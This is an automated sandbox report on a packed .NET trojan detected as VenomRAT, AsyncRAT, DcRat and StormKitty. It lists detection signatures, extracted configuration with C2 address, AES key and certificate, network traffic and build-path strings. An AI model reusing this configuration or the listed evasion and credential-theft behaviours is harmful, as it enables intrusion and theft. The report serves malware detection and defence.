Windows Analysis Report
SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Overview

General Information

Sample name: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe
Analysis ID: 1446514
MD5: 144f1b1c4b9cdad97d8dd1a3a89e7ea1
SHA1: 1a11d76a6ab646a0d699efa0e5fc71de6e5af92c
SHA256: e3f245020bcf6beaca39b8cc9eb06b3db7f209356e765f41d8306ad56735e944
Tags: exe, VenomRAT

Detection

AsyncRAT, DcRat, StormKitty, VenomRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AsyncRAT
Yara detected BrowserPasswordDump
Yara detected DcRat
Yara detected StormKitty Stealer
Yara detected VenomRAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Binary or sample is protected by dotNetProtector
Check if machine is in data center or colocation facility
Contains functionality to log keystrokes (.Net Source)
Disable UAC(promptonsecuredesktop)
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables UAC (registry)
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Windows Service Tampering
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Uses whoami command line tool to query computer and username
Very long command line found
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Name: AsyncRAT
Description: AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open-source remote administration tool; however, it can also be used maliciously because it provides functionality such as a keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name: DCRat
Description: DCRat is a typical RAT that has been around since at least June 2019.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name: Cameleon, StormKitty
Description: PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

AV Detection

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Avira: detected
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: C:\Users\user\AppData\Local\Temp\Client.exe Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Avira: detection malicious, Label: TR/Spy.Agent.qbvjl
Source: 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: VenomRAT {"Server": "66.235.168.242", "Ports": "3232", "Version": "", "Autorun": "true", "Install_Folder": "%AppData%", "Install_File": "Loaader.exe", "AES_key": "tE8IGfk7UYxxW5jF9uxnGzkxU8UnVy3F", "Mutex": "iFe4z2UwXC6AffU6", "Certificate": "MIICKTCCAZKgAwIBAgIVAOwI49vECmkjcVi6vDRu+6lTwBelMA0GCSqGSIb3DQEBDQUAMF0xDjAMBgNVBAMMBUVCT0xBMRMwEQYDVQQLDApxd3FkYW5jaHVuMRwwGgYDVQQKDBNEY1JhdCBCeSBxd3FkYW5jaHVuMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjMwNjI0MTA1NzMxWhcNMzQwNDAyMTA1NzMwWjAQMQ4wDAYDVQQDDAVEY1JhdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAwLjfJLJldOS/ukdvNaxCeCKlqSDodMxbIlUBJFj4ifPzaijU+Qc9+Jdvhi6ZCNs9E/uBCzQd+fJoEornr5T4fZqOQIS2naeK29VzB3/xJlBW3faQNOQXicF/HSbX0ljWeGIbgZr/lpicEtjGgA1RGEt0zY2hVTNIufmV3WTYnLkCAwEAAaMyMDAwHQYDVR0OBBYEFE37VDHHP+vN1IXecEP/zz0inroMMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEAaFlOwVBtr2Q4kDD0D5vcnSs/NiWSEKiRtNBVph0GxdbQXeE7epqNbjAM8aVZRDFw4hMP1gxetRk+Olcgp6/RDLzmei9uIydxJ8dk+KsCu0zWoL9yNWBx2BwVBNa7k3gAvh+CNuHFwb04ZG8kLR93TyFRZDUHUWglVnA3DQwJqrw=", "ServerSignature": "iMAOwDJA0vMpVx4GkSywNj1D9PkiTGYL8k2vajxwK0ZTkgcoy6ziEU37PU07UskWTqs4CQy9wpx58wUw1AAp0a59QrAxozzZ/IsZBApD2Cr3P8v6ZVT8lHLZwC7Rvm+MFMotN8SBl4jk9ACD4dSwXvpgx0mYcM4Mkw7WfxAX6J8=", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "1", "Group": "Default", "AntiProcess": "false", "AntiVM": "false"}
Source: 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: AsyncRAT {"Ports": ["3232"], "Server": ["66.235.168.242"], "Certificate": "MIICKTCCAZKgAwIBAgIVAOwI49vECmkjcVi6vDRu+6lTwBelMA0GCSqGSIb3DQEBDQUAMF0xDjAMBgNVBAMMBUVCT0xBMRMwEQYDVQQLDApxd3FkYW5jaHVuMRwwGgYDVQQKDBNEY1JhdCBCeSBxd3FkYW5jaHVuMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjMwNjI0MTA1NzMxWhcNMzQwNDAyMTA1NzMwWjAQMQ4wDAYDVQQDDAVEY1JhdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAwLjfJLJldOS/ukdvNaxCeCKlqSDodMxbIlUBJFj4ifPzaijU+Qc9+Jdvhi6ZCNs9E/uBCzQd+fJoEornr5T4fZqOQIS2naeK29VzB3/xJlBW3faQNOQXicF/HSbX0ljWeGIbgZr/lpicEtjGgA1RGEt0zY2hVTNIufmV3WTYnLkCAwEAAaMyMDAwHQYDVR0OBBYEFE37VDHHP+vN1IXecEP/zz0inroMMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEAaFlOwVBtr2Q4kDD0D5vcnSs/NiWSEKiRtNBVph0GxdbQXeE7epqNbjAM8aVZRDFw4hMP1gxetRk+Olcgp6/RDLzmei9uIydxJ8dk+KsCu0zWoL9yNWBx2BwVBNa7k3gAvh+CNuHFwb04ZG8kLR93TyFRZDUHUWglVnA3DQwJqrw=", "Server Signature": "iMAOwDJA0vMpVx4GkSywNj1D9PkiTGYL8k2vajxwK0ZTkgcoy6ziEU37PU07UskWTqs4CQy9wpx58wUw1AAp0a59QrAxozzZ/IsZBApD2Cr3P8v6ZVT8lHLZwC7Rvm+MFMotN8SBl4jk9ACD4dSwXvpgx0mYcM4Mkw7WfxAX6J8="}
Source: C:\Users\user\AppData\Local\Temp\Client.exe ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\Infected.exe ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Roaming\Loaader.exe ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Roaming\Loader.exe ReversingLabs: Detection: 81%
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe ReversingLabs: Detection: 73%
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Virustotal: Detection: 82%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Client.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Joe Sandbox ML: detected
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Loader.exe Code function: 20_2_00007FF8491200F2 CryptUnprotectData, 20_2_00007FF8491200F2
Source: C:\Users\user\AppData\Roaming\Loader.exe Code function: 20_2_00007FF84912DDB5 CryptUnprotectData, 20_2_00007FF84912DDB5
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.44.66:443 -> 192.168.2.5:61173 version: TLS 1.0
Source: unknown HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61013 version: TLS 1.2
Source: unknown HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:61014 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61016 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61017 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61033 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61036 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61038 version: TLS 1.2
Source: unknown HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:61040 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61044 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61063 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61065 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61071 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61079 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61096 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61110 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61113 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61116 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61120 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61131 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61132 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61134 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61136 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61137 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61139 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61140 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61142 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61145 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61146 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61149 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61153 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61164 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61166 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61170 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61174 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61176 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61177 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61180 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61183 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61184 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61186 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61187 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61189 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61190 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61192 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61193 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61194 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61195 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61199 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61201 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61201 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61203 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61205 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61207 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61209 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61211 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61213 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61216 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61217 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61218 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61220 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61221 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61223 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61225 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61226 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61227 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61228 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61229 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61231 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61232 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61233 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61234 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61236 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61243 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61244 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61245 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61247 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61248 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61251 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61252 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61255 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61256 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61258 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61259 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61260 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61262 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61266 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61271 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61273 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61274 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61278 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61279 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61282 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61286 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61289 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61291 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61292 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61293 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61295 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61297 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61298 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61299 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61300 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61301 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61302 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61304 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61306 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61307 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61309 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61310 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61311 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61312 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61313 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61316 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61317 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61319 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61320 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61321 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61322 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61324 version: TLS 1.2
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: %costura.messagepacklib.pdb.compressed source: Loader.exe, 00000014.00000002.2527964251.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.ni.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: costura.costura.pdb.compressed source: Loaader.exe, 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Keylogger.pdb source: Loader.exe, 00000014.00000002.2813392889.000000001CC40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Drawing.ni.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: tion.pdb source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb`- source: WER3812.tmp.dmp.30.dr
Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: Loader.exe, 00000014.00000002.2860415941.000000001D617000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER3812.tmp.dmp.30.dr
Source: Binary string: WinDefend.pdb source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005938092.0000000012919000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000000.2004261528.0000000000BEC000.00000002.00000001.01000000.00000008.sdmp, WinDefend.exe.0.dr
Source: Binary string: lib.pdbX source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER3812.tmp.dmp.30.dr
Source: Binary string: 0C:\Windows\mscorlib.pdb source: Loader.exe, 00000014.00000002.2860415941.000000001D617000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: SendMemory.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER3812.tmp.dmp.30.dr
Source: Binary string: System.Core.ni.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: Microsoft.VisualBasic.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: Logger.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb^ source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Keylogger.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000002F.00000002.3065403253.0000029A21DC5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Recovery.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER3812.tmp.dmp.30.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER3812.tmp.dmp.30.dr
Source: Binary string: System.Dynamic.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Recovery.pdb source: Loader.exe, 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: MessagePackLib.pdbzZ) source: WER3812.tmp.dmp.30.dr
Source: Binary string: mscorlib.ni.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: SendMemory.pdb g source: WER3812.tmp.dmp.30.dr
Source: Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Logger.pdb source: Loader.exe, 00000014.00000002.2746255140.000000001B4A0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: mscorlib.pdb Operatin source: powershell.exe, 0000002F.00000002.3076280721.0000029A21FE4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbP source: WER3812.tmp.dmp.30.dr
Source: Binary string: Extra.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER3812.tmp.dmp.30.dr
Source: Binary string: symbols\dll\mscorlib.pdbpdb source: Loader.exe, 00000014.00000002.2860415941.000000001D617000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\MessagePack\bin\Release\MessagePackLib.pdb source: Loader.exe, 00000014.00000002.2812581762.000000001CA40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: Extra.pdb` source: WER3812.tmp.dmp.30.dr
Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: System.Xml.ni.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: System.ni.pdbRSDS source: WER3812.tmp.dmp.30.dr
Source: Binary string: Microsoft.CSharp.pdb source: WER3812.tmp.dmp.30.dr
Source: Binary string: lib.pdb source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\SendMemory.pdb source: Loader.exe, 00000014.00000002.2744256904.000000001B430000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WER3812.tmp.dmp.30.dr
